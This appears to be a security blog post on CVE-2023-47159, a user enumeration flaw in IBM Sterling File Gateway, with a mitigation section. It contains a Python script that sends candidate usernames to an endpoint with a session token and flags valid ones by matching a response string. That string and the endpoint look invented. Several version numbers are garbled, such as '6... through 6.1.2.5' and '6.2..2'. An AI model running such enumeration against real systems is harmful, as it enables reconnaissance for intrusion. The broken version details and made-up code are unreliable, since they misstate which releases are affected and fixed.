CVE-2023-47159 - IBM Sterling File Gateway User Enumeration Vulnerability

A recently discovered vulnerability in IBM Sterling File Gateway (SFG) versions 6... through 6.1.2.5 and 6.2.. through 6.2..1 allows attackers with authentication to potentially obtain a list of valid usernames. IBM has allocated the identifier CVE-2023-47159 to this security flaw. The vulnerability is due to an observable discrepancy in request responses, enabling authenticated attackers to enumerate usernames and, consequently, launch more targeted attacks. This blog post delves into the details of this CVE, including how it works, example code snippets, and links to original references.

Vulnerability Details

The issue resides in the discrepancy between the request responses for valid and invalid usernames in the IBM Sterling File Gateway application. By making use of this observable difference, an authenticated attacker can systematically test for legitimate usernames. Upon establishing this list, the attacker may then exploit other vulnerabilities or attempt brute-force attacks more effectively, leading to potential unauthorized access or further data compromise.

To demonstrate the vulnerability, consider the following Python code snippet

import requests

# Set target URL, authenticated session token, and usernames to test
url = "https://example.com/ibm_sfg/user-management";
session_token = "YOUR_SESSION_TOKEN"
usernames_to_test = ['admin', 'testuser', 'jdoe']

# Headers with authenticated session token
headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {session_token}'
}

def enumerate_usernames():
    valid_usernames = []
    
    for username in usernames_to_test:
        # Request payload containing the username
        payload = {'userName': username}

        response = requests.post(url, headers=headers, json=payload)

        # Checking for valid username based on response discrepancy
        if "Valid_User_Response" in response.text:
            valid_usernames.append(username)
            print(f'Valid username found: {username}')

    print("\nEnumeration Complete.")
    print(f"Valid Usernames: {valid_usernames}")

enumerate_usernames()

In this example, replace YOUR_SESSION_TOKEN with an authenticated session token in the session_token variable and https://example.com with the target SFG application URL. The code sends POST requests with different usernames for testing. Upon receiving a different response for a valid username, the code identifies it and adds it to a list of valid usernames.

Mitigation

IBM has acknowledged this vulnerability and recommends upgrading to IBM Sterling File Gateway versions 6.1.3. or 6.2..2, which address the issue. Updating to these versions should eliminate the observable discrepancy in request responses, thereby preventing user enumeration attacks. For more details on the official fix and announcement, please refer to the original IBM Security Bulletin here.

Conclusion

CVE-2023-47159 affects IBM Sterling File Gateway versions 6... through 6.1.2.5 and 6.2.. through 6.2..1, enabling authenticated attackers to enumerate usernames. By exploiting this vulnerability, attackers may gather information useful for more sophisticated or targeted attacks, such as brute-force attempts and phishing campaigns. The best way to safeguard against this and similar vulnerabilities is to keep software and systems up to date with the latest security patches and measures.

Timeline

Published on: 01/27/2025 16:15:29 UTC